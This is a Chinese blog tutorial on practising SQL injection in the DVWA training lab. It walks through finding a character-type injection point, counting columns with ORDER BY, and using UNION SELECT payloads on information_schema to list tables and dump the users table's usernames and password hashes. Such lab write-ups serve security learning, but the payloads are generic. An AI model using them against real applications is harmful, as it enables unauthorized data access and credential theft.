DVWA靶场

最新推荐文章于 2024-07-20 19:18:51 发布
最新推荐文章于 2024-07-20 19:18:51 发布
阅读量824 收藏 11
点赞数 24
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77490589/article/details/140124851
版权

DVWA(Damn Vulnerable Web Application)是一个用于练习 Web 应用程序安全漏洞的靶场。以下是在 DVWA 靶场中进行万能登录 SQL 注入实验的一般步骤:

1. 环境搭建:首先,需要搭建好 DVWA 靶场环境。可以按照相关的安装指南进行操作,包括安装 Web 服务器(如 Apache)、数据库(如 MySQL),并将 DVWA 部署到相应的服务器上。

2. 登录 DVWA:在浏览器中访问 DVWA 的页面,使用默认的用户名(通常是 admin)和密码(如 password)登录。

3. 调整安全级别:将 DVWA 的安全级别设置为低(Low)。这个级别是完全易受攻击的,没有做任何安全防护,用于展示不良编程实践导致的 Web 应用程序漏洞。

4. 进入 SQL Injection 模块:在 DVWA 的界面中找到 SQL Injection 模块并进入。

5. 判断注入点和注入类型

  • 在输入框中输入一个简单的数字,如 1,提交后观察返回的结果。
  • 再输入类似 1' 的字符,提交后如果服务器报错,且能看到多了一个单引号,那么很可能是字符型注入。例如,输入 1' 后服务器回显出错,说明是字符型注入。

6. 判断可查询字段数:使用 ORDER BY 子句进行判断。例如,输入 1'order by 1-- ;1'order by 10-- 等(二分法),通过观察回显结果的变化,确定表中有几列是可控的。

7. 确定回显点:使用 -1'union select 1,2 -- 等语句,确定回显位置。

8. 查询相关信息

  • 查询用户名和数据库名:-1'union select user(),database() -- 。
  • 查询表名:-1'union select 1,table_name from information_schema.tables where table_schema='dvwa'-- 。
  • 查询列名:-1'union select 1,column_name from information_schema.columns where table_name='users' -- 。
  • 查询用户名和密码:-1'union select user,password from users -- 。

以下是针对 DVWA 低安全级别(Low Level)的万能登录 SQL 注入实验的详细步骤及解释:

  1. 首先判断是否存在漏洞。输入1提交,会回显对应的用户信息;输入1'提交,服务器报错,由此可确定存在漏洞,且数据库为 MySQL,同时根据报错信息可知这是字符型注入(因为多了一个单引号)。
  2. 接着判断 POC(Proof of Concept,概念验证)方式。输入1'or '1'='1提交,回显了所有用户的信息。其原理是:第一个单引号闭合了原本 SQL 查询语句中的单引号,后面加入的或运算'1'='1是恒成立的条件,所以无论用户 ID 是什么,都会满足查询条件并被回显出来。
  3. 然后使用 union 注入查询字段数。输入1'order by 1--1'order by 10--等,通过二分法不断尝试,最后确定字段数为 2(当输入1'order by 3--时报错,说明字段数小于 3)。
  4. 确定回显点:输入-1'union select 1,2 --,确定回显位置为 2(--后有空格)。
  5. 查询用户名和数据库名:输入-1'union select user(),database() --,结果为root(用户名)、dvwa(数据库名)。
  6. 查询表名:输入-1'union select 1,table_name from information_schema.tables where table_schema='dvwa'--,结果为guestbookusers
  7. 查询列名:输入-1'union select 1,column_name from information_schema.columns where table_name='users' --,结果为userpassword等。
  8. 查询用户名和密码:输入-1'union select user,password from users --,可得到用户名和密码。
小 X
关注
  • 24
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
DVWA靶场源码分享
12-11
DVWA靶场提供了各种级别的漏洞,从低到高,让使用者能够逐步挑战并了解如何发现和修复这些漏洞。 在“DVWA靶场源码分享”中,你将获得DVWA的源代码,这将允许你在本地环境中设置和运行这个应用。这样,你就可以在...
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
dvwa靶场训练.rar
03-17
DVWA靶场训练——新手入门Web安全与渗透测试指南》 DVWA(Damn Vulnerable Web Application)是一款专为Web安全学习和渗透测试设计的开源靶场,它提供了各种典型的Web应用程序安全漏洞,帮助初学者了解和实践网络...
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
技术笔记
07-17 838
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
多租户架构的艺术:在SQL Server中实现数据库的多租户
2401_85762266的博客
07-20 297
多租户架构允许多个租户共享相同的应用程序和数据库架构,每个租户的数据被逻辑上隔离。这种架构的优势在于成本效益和可扩展性,但同时也带来了数据隔离、性能和安全性的挑战。
接口开发:Orcal数据库的批量新增sql
qq_65032048的博客
07-17 766
场景:在日常的CURD中一定会用到批量新增。在我们的项目中,使用的数据库是Orcal,由于之前基本都是使用Mysql的,使用的sql语句也基本都是用mysql的。但是在这次的接口编写时用mysql的批量新增出了问题,刚开始我还以为是写的动态sql有问题,在后续的问题修改也主要是对动态sql修改,因此也浪费了大量的时间,在后续把sql搬到数据库运行一下后才发现是sql的问题,同时也了解到了mysql和orcal 也是有很多地方是不同的。
SQL执行流程、SQL执行计划、SQL优化
风中的默默
07-19 202
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
SQL每日一题:查找重复的电子邮箱
xiongxiaoxuan的博客
07-17 351
编写解决方案来报告所有重复的电子邮件。请注意,可以保证电子邮件字段不为 NULL。以 任意顺序 返回结果表。按照email分组计数,筛选出数量>1的email。(需注意分组计数时一定要记得用group by)此表的每一行都包含一封电子邮件。电子邮件不包含大写字母。id 是该表的主键(具有唯一值的列)。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 1098
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
SQL Server报告服务的艺术:在SSRS中打造专业报告
2401_85760095的博客
07-20 550
SQL Server Reporting Services是一个全面的报告解决方案,它允许从各种数据源生成复杂的交互式和移动友好的报告。SSRS包括一个集成的开发环境,用于设计报告,以及一个部署环境,用于发布和共享报告。
怎样在 PostgreSQL 中实现数据的异地备份?
技术笔记
07-19 883
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
【PostgreSQL】Windows 上安装 PostgreSQL 16版本
No8g攻城狮的博客
07-17 1065
✌全网粉丝20W+,CSDN博客专家、Java领域优质创作者,掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域✌。
SQL Server的视图
weixin_49668551的博客
07-16 1018
SQL 视图(Views)是一种虚拟表,是基于 SQL 查询结果生成的。这些虚拟表可以包含来自一个或多个表的数据,并且可以像表一样查询;视图是一个表中的数据经过某种筛选后的显示方式,或者多个表中的数据经过连接筛选后的显示方式。使用视图可以简化复杂查询,提高查询的可读性和可维护性,并提供数据的不同视图。视图由一个预定义的查询(SELECT语句)组成,可以像基本表一样用于SELECT语句中;
在 PostgreSQL 里如何实现数据的分布式事务的事务传播和协调?
技术笔记
07-18 863
在分布式系统中,一个事务可能涉及到多个不同的节点或数据库。分布式事务就是要确保在这些多个操作中,要么所有的操作都成功提交,要么所有的操作都回滚,以保持数据的一致性。打个比方,这就好比一个团队合作完成一个项目,如果其中一个环节出了问题,整个项目都可能受到影响,所以需要确保每个环节都能顺利完成,或者在出现问题时能够及时回滚,避免出现部分完成、部分失败的情况。在本文中,我们深入探讨了在 PostgreSQL 中如何实现数据的分布式事务的事务传播和协调。
如何处理 PostgreSQL 中死锁的情况?
技术笔记
07-19 925
处理 PostgreSQL 中的死锁情况需要我们综合运用预防、检测、解决和优化等多种手段。就像在一场复杂的交通拥堵中,需要交警的指挥、道路的规划、司机的配合以及交通规则的完善,才能保证道路的畅通无阻。对于数据库管理员和开发者来说,要时刻保持警惕,不断优化数据库的设计和操作,以确保系统的稳定和高效运行。只有这样,才能在遇到死锁这个“拦路虎”时,从容应对,顺利解决问题。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf。
SQL Server中的数据加速器:实现数据库的自定义索引
最新发布
2402_85758349的博客
07-20 572
在数据库管理的世界里,索引是提升查询性能的关键。SQL Server作为强大的关系型数据库管理系统,支持创建自定义索引来优化数据访问。本文将深入探讨如何在SQL Server中实现数据库的自定义索引,并提供实际的代码示例。索引是数据库表中一个或多个列的数据结构,可以加快数据检索速度。索引可以是聚集索引(Clustered Index)或非聚集索引(Non-Clustered Index)。聚集索引:按照索引键的顺序重新排列表中的数据。非聚集索引:索引结构和数据存储是分开的,索引包含指向数据的指针。
在 PostgreSQL 中如何实现数据的加密存储?
技术笔记
07-19 777
总的来说,在 PostgreSQL 中实现数据的加密存储是一项重要而又具有挑战性的任务。我们需要根据实际需求选择合适的加密方式,认真管理好加密密钥,充分考虑性能影响,并在实际应用中注意各种细节。这就像是建造一座坚固的城堡,每一块石头、每一道防线都要精心设计和建造。只有这样,我们才能真正保护好数据库中的宝贵数据,让它们在数字世界里安然无恙。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册。
dvwa靶场xss攻击
09-25
DVWA靶场是一个用于学习和测试网络安全漏洞的虚拟环境。在DVWA靶场中,有一个特定的漏洞被称为XSS(跨站脚本攻击)。XSS攻击是一种利用网页应用程序对用户输入的处理不当而进行的攻击。通过在受害者浏览器中执行恶意脚本,攻击者可以窃取用户的敏感信息、劫持用户会话或者操纵网页内容。 在DVWA靶场中,有两种XSS攻击方式:存储型XSS和反射型XSS。存储型XSS攻击是指攻击者将恶意代码嵌入到后台服务器的存储区域,当其他用户访问这个页面时,恶意代码就会被执行。而反射型XSS攻击是通过欺骗用户点击一个包含恶意代码的链接来实现攻击。 要在DVWA靶场中进行XSS攻击,可以按照以下步骤进行: 1. 首先,需要确定XSS漏洞的存在,可以通过尝试在输入框中插入一些特殊字符或标签,如<script>标签,来判断是否能成功执行恶意代码。 2. 如果成功执行了恶意代码,可以尝试构造payload来获取用户的cookie等敏感信息。 3. 进一步,可以尝试利用XSS漏洞来进行会话劫持或者篡改网页内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值